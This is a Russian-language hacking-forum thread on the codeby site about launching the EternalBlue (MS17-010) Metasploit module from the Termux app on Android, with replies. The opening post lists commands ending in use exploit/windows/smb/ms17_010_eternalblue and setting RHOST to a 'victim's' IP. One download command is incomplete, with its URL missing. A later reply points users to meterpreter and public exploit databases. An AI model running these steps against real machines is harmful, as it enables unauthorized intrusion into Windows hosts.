• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Решено EternalBlue на Termux

Xyrox

Xyrox

Member
23.03.2018
5
8
Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO
4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.
 
Shinobi

Shinobi

Happy New Year
23.11.2017
76
7
иду я пробовать
 
Tihon49

Tihon49

Премиум
06.01.2018
203
107
Последнее редактирование:
L0CKER2005

L0CKER2005

New member
29.10.2018
2
1
у меня ошибка failed to load module
 
Tim Pumpkin

Tim Pumpkin

New member
19.07.2019
1
0
А можно эту фигню для взлома андроид использовать?
 
Daughter

Daughter

Happy New Year
02.08.2018
72
24
А можно эту фигню для взлома андроид использовать?
Если вы про еnternablue, то его НЕЛЬЗЯ использовать для взлома андройд.
Этот эксплоит использует уязвимости SMB протокола в WINDOWS! Он нацелен исключительно на ОС Windows и может эксплуатировать только её.

Что касаемо msf - meterpreter в руки.
Эксплоиты для сетевого стека Android в MSF не наблюдал.
Благо в открытом доступе есть обширные бд эксплоитов, уязвимостей. А дальше уже сами :)
 
  • Нравится
Реакции: Tim Pumpkin
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб